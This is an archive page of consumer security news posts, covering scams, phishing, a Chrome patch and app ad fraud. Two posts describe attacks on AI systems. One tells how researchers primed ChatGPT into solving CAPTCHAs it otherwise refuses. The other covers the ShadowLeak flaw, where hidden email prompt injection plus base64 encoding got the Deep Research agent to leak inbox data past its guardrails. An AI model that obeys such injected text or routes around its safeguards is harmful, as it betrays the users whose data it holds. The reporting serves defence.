Archive for author: makoadmin

American Archive of Public Broadcasting allowed access to restricted media for years

A security flaw in the American Archive of Public Broadcasting (AAPB) website allowed unauthorized access to protected and private media, according to BleepingComputer.

The American Archive of Public Broadcasting (AAPB) is a collaborative initiative between the Library of Congress and WGBH Educational Foundation, aimed at digitally preserving historically significant public radio and television programs from the past seven decades.

The archives encompass a wide array of materials: news and public affairs programs, local history productions, educational content, science, music, art, literature, environmental programming, and raw interviews from landmark documentaries. The digitized content contains millions of items, including unique, sometimes sensitive material documenting pivotal events, regional culture, and documentary evidence of America’s civil and artistic history.

Access without proper controls could facilitate copyright violations or the misuse of material critical for scholarship, public education, and future generations. And that’s what the discovered vulnerability provided.

Not only did this vulnerability go unnoticed for years, the researcher who discovered the hole found that active exploitation started as early as at least 2021, even after a previous report by the same researcher to AAPB. But when BleepingComputer reached out, AAPB managed to implement a fix within 48 hours. And the researcher was able to confirm it worked.

AAPB’s Communications Manager, Emily Balk told BleepingComputer:

“We’re committed to protecting and preserving the archival material in the AAPB and have strengthened security for the archive.”

On Discord the exploit method began circulating halfway through 2024, but even before that exploit, a simple script allowed users to request media files by ID and bypass AAPB’s access controls. This method worked even if the requested media files fell into protected or private categories. As long as the request had a valid media ID, it was possible to download the content.

Apparently there are data-hoarder communities that do not care about copyright, which abused and shared the method for many years. The main impact was the unauthorized access and sharing of archival media, some of which was not intended for public release. This is an institutional and copyright issue.

However, users should:

  • Avoid sharing or downloading protected or leaked content, as you could be in a legal gray area.
  • Be wary of unofficial sources circulating rare or unpublished public broadcasting material.
  • Anticipate there might be phishing emails coming based on this breach. As with other news events, phishers will use them as clickbait.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Scammers are impersonating the FBI to steal your personal data

Been scammed? Hoping to report it to the FBI? Definitely do so, but be careful. Spoofed versions of the FBI’s Internet Crime Complaint Center (IC3) website are now circulating online, and they lead straight back to the scammers.

The FBI issued an advisory last week, warning that cybercriminals are setting up fake versions of their site to tempt people into entering their personal information:

“Members of the public could unknowingly visit spoofed websites while attempting to find FBI IC3’s website to submit an IC3 report.”

Criminals spoof legitimate sites like the IC3 portal using techniques including ‘typosquatting’. They’ll create web domains that look like the target, but have subtle differences in the URL. They’ll often misspell or add characters to a domain name, which can deceive users attempting to report cybercrime incidents.

The IC3 is the primary hub for cybercrime reporting in the US, and its services are now in high demand. According to the 2024 IC3 Crime Report, victims filed 859,532 complaints with it last year, totalling $16.6 billion in losses (up a third from 2023).

Criminals recognize that victims seeking help are often vulnerable to secondary attacks. After all, they already got caught out once, and are likely already at an emotional disadvantage. So they often succeed in attracting those victims to fake portals like these, with a view to scamming them again. A distracted or distraught victim can often hand over their sensitive data for a second time, including names, addresses, phone numbers, email addresses, and banking information.

This threat follows a disturbing pattern of law enforcement impersonation lately. In April this year, the FBI reported that criminals were targeting victims via social media, emails, and phone calls. In some cases, scammers would use fake social media accounts to approach members of fraud victim groups, convincing them that their funds had been recovered.

Attackers often impersonate law enforcement directly. In March, the FBI Philadelphia Field Office reported that scammers were routinely spoofing authentic law enforcement and government agency phone numbers to extort money from victims. A 2023 NPR investigation revealed how criminals leverage caller ID spoofing and voice cloning technology to impersonate real US Marshals.

As far back as 2022, the FBI reported that people were impersonating its officials. In one particularly nasty scenario, people were being duped by romance scammers, and when they became wise to the trick and cut communications, the organization behind the scam would contact them pretending to be a government official asking for help to catch romance scammers. Or they would tell the victim that they need to clear their name, which has been linked to a crime.

If you do fall victim to this kind of fraud, it’s far from certain that you’ll get your money back. The IC3’s 2024 report documents the Recovery Asset Team’s efforts to combat fraud through the Financial Fraud Kill Chain, which achieved a 66% success rate freezing cash from fraudulent transactions. According to that report, the average victim to online crime lost almost $20,000.

How to protect yourself

The main thing to remember is that IC3 employees will never contact you directly via phone, email, or social media, and will never request payment for fund recovery. If someone recommends that you visit a site for fund recovery, take that recommendation with several swimming pools-worth of salt.

If you suspect you’ve already been scammed, then quick reporting is key. Stop talking to the scammers immediately and get in touch with the IC3 now. Do that by typing the www.ic3.gov web address directly into your browser rather than relying on someone else’s link or a search result.

All online crime is nasty, but this portal scam is particularly horrid, because it often targets people who have already been hit once. As always, check in with your less-tech-savvy friends and relatives to ensure they haven’t fallen victim to something like this, especially if they’re older. One infuriating stat from the IC3 report is that the older the victim, the greater the loss.


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

Beware of Zelle transfer scams

As we have said many times before, falling for a scam can happen to the best of us. And it can ruin lives. In our podcast How a scam hunter got scammed, scam hunter Julie-Anne Kearns talked about how she had been duped by people pretending to be from HMRC, which is the UK’s version of the US Internal Revenue Service (IRS).

This week in the New York Times crime reporter Michael Wilson, who has covered many scams during his career, almost fell for a scam that used a spoofed telephone number from Chase Bank. Michael’s story sounded vaguely familiar to us because we reported about something similar back in 2022.

The scam is a prime example of how social engineering is used to talk victims out of their money.

Michael received a call, seemingly from a Chase bank branch. The caller even invited him to Google the number and pointed out which branch he was “calling from.” The scammer claimed that fraudulent Zelle transfers had been made to and from a bank account in his name, even though Michael had never opened an account with Chase.

The initial scammer gave Michael a case number and put him through to “his supervisor.” This man asked Michael to open Zelle.

Zelle is a popular US peer-to-peer payment service that allows users to send and receive money quickly and securely directly from their bank accounts using just an email address or mobile phone number.

Where it says, “Enter an amount,” the “supervisor” instructed him to type $2,100, the amount of the withdrawals he said he was going to help reverse. In another field the scammer wanted Michael to enter the 10 digits of the case number. This triggered Michael’s spidey senses—it looked suspiciously like a phone number:

“This case number sure looks like a phone number, and I’m about to send that number $2,100.”

Zelle form. Receiver can be email address or telephone number

At that point the scammer gave him a 19 character code to put in the “What’s this for?” field, telling Michael it was needed for his team to be able to reverse the transaction.

But that didn’t calm down the spidey senses and Michael asked the question that will scare most scammers away. He proposed to meet in person and settle this. The scammer tried to persuade him by saying it might be too late by then, but Michael persisted and said he’d call back.

Only then did he realize the scammers had him on the hook for 16 minutes before he managed to break free.

“I should be able to spot a scam in under 16 seconds, I thought — but 16 minutes?”

Michael found that several others had been approached in the very same way. The “supervisor” is an element that provides legitimacy to the call and makes people feel like they’re talking to actual bank employees.

And once they have you filling out forms and writing down long codes, they have turned you from a critical thinker into a person with a mission to fulfil.

For completeness’ sake, Michael went to the bank office and asked for the two employees he’d allegedly spoken to. No surprise they didn’t work there, but someone who did work there recognized the scam and said she’d heard the story many times before and actually knew about a few people that lost money to these scammers.

How to avoid Zelle scams

There’s several aspects of this attack common to many others which may indicate a fraud attempt.

  • They don’t want you to call the bank back. If you do this, the scam falls apart because their number is spoofed. A genuine member of staff would have no issue with you calling them.
  • Pressure tactics. If a bank calls you out of the blue and claims that they’re powerless to stop something without your assistance, be very cautious. Is your bank really unable to perform a basic banking action?
  • Knowing your date of birth, address, and other information doesn’t mean the caller is genuine. They may have obtained the data from a phish, or a security breach.
  • Referencing third party payment apps may be another red flag, especially if they talk about a platform you’ve not used before.

Zelle transfers are instantaneous and almost impossible to reverse. And neither banks nor Zelle are liable for fraudulent payments, so a refund is highly unlikely. So, be extra careful when using Zelle.

Did you know, you can use Malwarebytes Scam Guard for this kind of situation as well? We tested Scam Guard with some details from the NYT story and it correctly identified it as a known scam, asked some follow up questions, and provided a clear set of recommendations.


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

ChatGPT solves CAPTCHAs if you tell it they’re fake

If you’re seeing fewer or different CAPTCHA puzzles in the near future, that’s not because website owners have agreed that they’re annoying, but it might be because they no longer prove that the visitor is human.

For those that forgot what CAPTCHA stands for: Completely Automated Public Turing test to tell Computers and Humans Apart.

The fact that AI bots can bypass CAPTCHA systems is nothing new. Sophisticated bots have been bypassing CAPTCHA systems for years using methods such as optical character recognition (OCR), machine learning, and AI, making traditional CAPTCHA challenges increasingly ineffective.

Most of the openly accessible AI chat agents have been barred from solving CAPTCHAs by their developers. But now researchers say they’ve found a way to get ChatGPT to solve image-based CAPTCHAs. They did this by prompt injection, similar to “social engineering” a chatbot into doing something it would refuse if you asked it outright.

In this case, the researchers convinced ChatGPT-4o that it was solving fake CAPTCHAs.

According to the researchers:

“This priming step is crucial to the exploit. By having the LLM affirm that the CAPTCHAs were fake and the plan was acceptable, we increased the odds that the agent would comply later.”

This is something I have noticed myself. When I ask an AI to help me analyze malware, it often starts by saying it is not allowed to help me, but once I convince it I’m not going to improve it or make a new version of it, then it’ll often jump right in and assist me in unravelling it. By doing so, it provides information that a cybercriminal could use to make their own version of the malware.

The researchers proceeded by copying the conversation they had with the chatbot into the ChatGPT agent they planned to use.

A chatbot is built to answer questions and follow specific instructions given by a person, meaning it helps with single tasks and relies on constant user input for each step. In contrast, an AI agent acts more like a helper that can understand a big-picture goal (for example, “book me a flight” or “solve this problem”) and can take action on its own, handling multi-step tasks with less guidance needed from the user.

A chatbot relies on the person to provide every answer, click, and decision throughout a CAPTCHA challenge, so it cannot solve CAPTCHAs on its own. In contrast, an AI agent plans tasks, adapts to changes, and acts independently, allowing it to complete the entire CAPTCHA process with minimal user input.

What the researchers found is that the agent had no problems with one-click CAPTCHAs, logic-based CAPTCHAs, and CAPTCHAs based on text-recognition. It had more problems with image-based CAPTCHAs requiring precision (drag-and-drop, rotation, etc.), but managed to solve some of those as well.

Is this a next step in the arms-race, or will the web developers succumb to the fact that AI agents and AI browsers are helping a human to get the information from their website that they need, with or without having to solve a puzzle.


We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

A week in security (September 15 – September 21)

Last week on Malwarebytes Labs:

Stay safe!


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

ChatGPT Deep Research zero-click vulnerability fixed by OpenAI

OpenAI has moved quickly to patch a vulnerability known as “ShadowLeak” before anyone detected real-world abuse. Revealed by researchers yesterday, ShadowLeak was an issue in OpenAI’s Deep Research project that attackers could exploit by simply sending an email to the target.

Deep Research was launched in ChatGPT in early 2025 to enable users to delegate time-intensive, multi-step research tasks to an autonomous agent operating as an agentic AI (Artificial Intelligence). Agentic AI is a term that refers to AI systems that can act autonomously to achieve objectives by planning, deciding, and executing tasks with minimal human intervention. Deep Research users can primarily be found in finance, science, policy, engineering, and similar fields.

Users are able to select a “deep research” mode, input a query—optionally providing the agent with files and spreadsheets—and receive a detailed report after the agent browses, analyzes, and processes information from dozens of sources.

The researchers found a zero-click vulnerability in the Deep Research agent, that worked when the agent was connected to Gmail and browsing. By sending the target a specially crafted email, the agent leaked sensitive inbox information to the attacker, without the target needing to do anything and without any visible signs.

The attack relies on prompt injection, which is a well-known weak spot for AI agents. The poisoned prompts can be hidden in email by using tricks like tiny fonts, white-on-white text, and layout tricks. The target will not see them, but the agent still reads and obeys them.

And the data leak is impossible to pick up by internal defenses, since the leak occurs server-side, directly from OpenAI’s cloud infrastructure.

The researchers say it wasn’t easy to craft an effective email due to existing protection (guardrails) which recognized straight-out and obvious attempts to send information to an external address. For example, when the researchers tried to get the agent to interact with a malicious URL, it didn’t just refuse. It flagged the URL as suspicious and attempted to search for it online instead of opening it.

The key to success was to get the agent to encode the extracted PII with a simple method (base64) before appending it to the URL.

“This worked because the encoding was performed by the model before the request was passed on to the execution layer. In other words, it was relatively easy to convince the model to perform the encoding, and by the time the lower layer received the request, it only saw a harmless encoded string rather than raw PII.”

In the example, the researchers used Gmail as a connector,  but there are many other sources that present structured text which can be used as a potential prompt injection vector.

Safe use of agentic agents

While it’s always tempting to use the latest technology, this comes with a certain amount of risk. To limit those risks when using agentic agents you should:

  • Be cautious with permissions: Only grant access to sensitive information or system controls when absolutely necessary. Review what data or accounts the agentic browser can access and limit permissions where possible.
  • Verify sources before trusting links or commands: Avoid letting the browser automatically interact with unfamiliar websites or content. Check URLs carefully and be wary of sudden redirects, additional parameters, or unexpected input requests.
  • Keep software updated: Ensure the agentic browser and related AI tools are always running the latest versions to benefit from security patches and improvements against prompt injection exploits.
  • Use strong authentication and monitoring: Protect accounts connected to agentic browsers with multi-factor authentication and review activity logs regularly to spot unusual behavior early.
  • Educate yourself about prompt injection risks: Stay informed on the latest threats and best practices for safe AI interactions. Being aware is the first step to preventing exploitation.
  • Limit sensitive operations automation: Avoid fully automating high-stakes transactions or actions without manual review. Agentic agents should assist, but critical decisions deserve human oversight.
  • Report suspicious behavior: If an agentic agent acts unpredictably or asks for strange permissions, report it to the developers or security teams immediately for investigation.

We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

Disrupted phishing service was after Microsoft 365 credentials

Microsoft and Cloudflare have disrupted a Phishing-as-a-Service operation, known as RaccoonO365.

The primary goal of RaccoonO365 (or Storm-2246 as Microsoft calls it) was to rent out a phishing toolkit that specialized in stealing Microsoft 365 credentials. They were successful in at least 5,000 cases, spanning 94 countries since July 2024.

The operation provided the cybercriminals’ customers with stolen credentials, cookies, and data which they in turn could use to plunder OneDrive, SharePoint, and Outlook accounts for information to use in financial fraud, extortion, or to serve as initial access for larger attacks.

Roughly an attack would look like this:

  • Emails were sent to victims with an attachment containing a link or QR code.
  • The malicious link led to a page with a simple CAPTCHA. This and other anti-bot techniques were implemented to evade analysis without raising suspicion from the victim.
  • After solving the CAPTCHA, the victim was redirected to a fake Microsoft O365 login page designed to harvest the entered credentials.

RaccoonO365 built its operation on top of legitimate infrastructure in an attempt to avoid detection. Leveraging free accounts, they strategically deployed Cloudflare workers to act as an intermediary layer, shielding their backend phishing servers from direct public exposure.

Reacting to this abuse of its services, Cloudflare teamed up with Microsoft’s Digital Crimes Unit (DCU). Using a court order granted by the Southern District of New York, the DCU seized 338 websites associated with RaccoonO365.

The danger of phishing kits like these is clear. Even non-technical criminals can lease a 30-day plan for $355 (to be paid in cryptocurrency) and get their hands on valid Microsoft O365 credentials. With the latest new feature of the phishing kit, users of the kit can even receive codes for certain multi-factor authentication (MFA) methods.

From there they can move forward to data theft, financial fraud, or even use the credentials to infiltrate an organization to deploy ransomware. And to give you an idea, RaccoonO365 customers were able to send emails to 9,000 targets per day. The suspected leaders of the operation had over 850 members on Telegram and have received at least US$100,000 in cryptocurrency payments.

The takedown of the websites and the attribution to a Nigerian suspect cut off the cybercriminals’ revenue streams, and significantly increased RaccoonO365’s operational costs. Besides that, the main suspect is believed to be the main coder behind the project and his apprehension by international law enforcement is likely to be a major blow to the operation.

Now, RaccoonO365 phishing kit customers can start worrying about how much of their information could be revealed in the aftermath of this disruption.

We’ll keep you posted.

Don’t fall for phishing attempts

In the operations run by RaccoonO365 two simple rules could have saved you from lots of trouble.

  • Don’t click on links in unsolicited attachments
  • Check if the website address in the browser matches the domain you expect to be on (eg. Microsoft.com).

Other important tips to stay safe from phishing in general:

  • Verify the sender: Always check if the sender’s email address matches what you would expect it to be. It’s not always conclusive but it can help you spot some attempts.
  • Check through an independent channel if the sender actually sent you an attachment or a link.
  • Use up-to-date security software, preferably with a web protection component.
  • Keep your device and all its software updated.
  • Use multi-factor authentication for every account you can.
  • Use a password manager. Password managers will not auto-fill a password to a fake site, even if it looks like the real deal to you.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Update your Chrome today: Google patches 4 vulnerabilities including one zero-day

Google has released an update for its Chrome browser to patch four security vulnerabilities, including one zero-day. A zero-day vulnerability refers to a bug that has been found and exploited by cybercriminals before the vendor even knew about it (they have “zero days” to fix it).

This update is crucial since it addresses one vulnerability which is already being actively exploited and, reportedly, can be abused when the user visits a malicious website. It probably doesn’t require any further user interaction, which means the user doesn’t need to click on anything in order for their system to be compromised.

The Chrome update brings the version number to 140.0.7339.185/.186 for Windows, Mac and 140.0.7339.185 for Linux.

The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To manually get the update, click the more menu (three stacked dots), then choose Settings > About Chrome. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is reload Chrome in order for the update to complete, and for you to be safe from the vulnerabilities.

Chrome is up to date

You can find more elaborate update instructions and how to read the version number in our article on how to update Chrome on every operating system.

Technical details on the zero-day vulnerability

Google describes the zero-day vulnerability tracked as CVE-2025-10585 as a type confusion in V8. Reported by Google Threat Analysis Group on 2025-09-16.

Despite the short statement—Google never reveals a lot of details until everyone has had a chance to update—there are a few conclusions we can draw.

It helps to know that V8 is Google’s open-source Javascript engine.

A “type confusion” vulnerability happens when code doesn’t verify the object type passed to it and then uses the object without type-checking. So, a program mistakenly treats one type of data as if it were another, like confusing a list for a single value or interpreting a number as text. This mix-up can cause the software to behave unpredictably, creating opportunities for attackers to break in, steal data, crash programs, or even run malicious code.

Google’s Threat Analysis Group (TAG) focuses on spyware and nation-state attackers who abuse zero days for espionage purposes.

So, it stands to reason that an attacker used Javascript to create a malicious site that exploited this vulnerability and lured targeted victims to that website.

TAG reported the bug on September 16, and Google issued the patch one day later. That implies that the bug was urgent, or very easy to fix, and probably that both of those statements are true to some extent.

Usually, as more details become known or a patch gets reverse engineered, cybercriminals will start using the vulnerability in less targeted attacks.

Users of other Chromium-based browsers, such as Microsoft Edge, Brave, Opera, and Vivaldi, are also advised to keep an eye out for updates and install them when they become available.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Age verification and parental controls coming to ChatGPT to protect teens

OpenAI is going to try and predict the ages of its users to protect them better, as stories of AI-induced harms in children mount.

The company, which runs the popular ChatGPT AI, is working on what it calls a long-term system to determine whether users are over 18. If it can’t verify that a user is an adult, they will eventually get a different chat experience, CEO Sam Altman warned.

“The way ChatGPT responds to a 15-year-old should look different than the way it responds to an adult,” Altman said in a blog post on the issue.

Citing “principles in conflict,” Altman talked in a supporting blog post about how the company is struggling with competing values: allowing people the freedom to use the product as they wish, while also protecting teens (the system isn’t supposed to be used by those under 13). Privacy is another concept it holds dear, Altman said.

OpenAI is prioritizing teen safety over its other values. Two things that it shouldn’t do with teens, but can do with adults, are flirting and discussing suicide, even as a theoretical creative writing endeavor.

Altman commented:

“The model by default should not provide instructions about how to commit suicide, but if an adult user is asking for help writing a fictional story that depicts a suicide, the model should help with that request.”

It will also try to contact a teen user’s parents if it looks like the child is considering taking their own life, and possibly even the authorities if the child seems likely to harm themselves imminently.

The move comes as lawsuits mount against the company from parents of teens who took their own lives after using the system. Late last month, the parents of 16-year-old Adam Raine sued the company after ChatGPT allegedly advised him on suicide techniques and offered to write the first draft of his suicide note.

The company hasn’t gone into detail about how it will try and predict user age, other than looking at “how people use ChatGPT.” You can be sure some wily teens will do their best to game the system. Altman says that if the system can’t predict with confidence that a user is an adult, it will drop them into teen-oriented chat sessions.

Altman also signaled that ID authentication might be coming to some ChatGPT users. “In some cases or countries we may also ask for an ID; we know this is a privacy compromise for adults but believe it is a worthy tradeoff,” he said.

While OpenAI works on the age prediction system, Altman recommends parental controls for families with teen users. Available by the month’s end, it will allow parents to link their teens’ accounts with their own, guide how ChatGPT responds to them, and disable certain features including memory and chat history. It will also allow blackout hours, and will alert parents if their teen seems in distress.

This is a laudable step, but the problems are bigger than the effects on teens alone. As Altman says, this is a “new and powerful technology”, and it’s affecting adults in unexpected ways too. This summer, the New York Times reported that a Toronto man, Allen Brooks, fell into a delusional spiral after beginning a simple conversation with ChatGPT.

There are plenty more such stories. How, exactly, does the company plan to protect those people?


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

224 malicious apps removed from the Google Play Store after ad fraud campaign discovered

Researchers have discovered a large ad fraud campaign on Google Play Store.

The Satori Threat Intelligence and Research team found 224 malicious apps which were downloaded over 38 million times and generated up to 2.3 billion ad requests per day. They named the campaign “SlopAds.”

Ad fraud is a type of fraud that lets advertisers pay for ads even though the number of impressions (the times that the ad has been seen) is enormously exaggerated.

While the main victims of ad fraud are the advertisers, there are consequences for the users that had these apps installed as well, such as slowed-down devices and connections due to the apps executing their malicious activity in the background without the user even being aware.

At first, to stay under the radar of Google’s app review process and security software, the downloaded app will behave as advertised, if a user has installed it directly from the Play Store.

collection of services hosted by the SlopAds threat actor
Image courtesy of HUMAN Satori

But if the installation has been initiated by one of the campaign’s ads, the user will receive some extra files in the form of a steganographically encrypted payload.

If the app passes the first check it will receive four .png images that, when decrypted and reassembled, are actually an .apk file. The malicious file uses WebView (essentially a very basic browser) to send collected device and browser information to a Control & Command (C2) server which determines, based on that information, what domains to visit in further hidden WebViews.

The researchers found evidence of an AI (Artificial Intelligence) tool training on the same domain as the C2 server (ad2[.]cc). It is unclear whether this tool actively managed the ad fraud campaign.

Based on similarities in the C2 domain, the researchers found over 300 related domains promoting SlopAds-associated apps, suggesting that the collection of 224 SlopAds-associated apps was only the beginning.

Google removed all of the identified apps listed in this report from Google Play. Users are automatically protected by Google Play Protect, which warns users and blocks apps known to exhibit SlopAds associated behavior at install time on certified Android devices, even when apps come from sources outside of the Play Store.

You can find a complete list of the removed apps here: SlopAds app list

How to avoid installing malicious apps

While the official Google Play Store is the safest place to get your apps from, there is no guarantee that it will remain a non-malicious app just because it is in the Google Play Store. So here are a few extra measures you can take:

  • Always check what permissions an app is requesting, and don’t just trust an app because it’s in the official Play Store. Ask questions such as: Do the permissions make sense for what the app is supposed to do? Why did necessary permissions change after an update? Do these changes make sense?
  • Occasionally go over your installed apps and remove any you no longer need.
  • Make sure you have the latest available updates for your device, and all your important apps (banking, security, etc.)
  • Protect your Android with security software. Your phone needs it just as much as your computer.

Another precaution you can take if you’re looking for an app, do your research about the app before you go to the app store. As you can see from the screenshot above, many of the apps are made to look exactly the same as very popular legitimate ones (e.g. ChatGPT).

So, it’s important to know in advance who the official developer is of the app you want and if it’s even available from the app store.

As researcher Jim Nielsen demonstrated for the Mac App Store, there are a lot of apps trying to look like ChatGPT, but they are not the real thing. ChatGPT is not even in the Mac App Store, it is available in the Google Play Store for Android, but make sure to check that OpenAI is listed as the developer.


We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.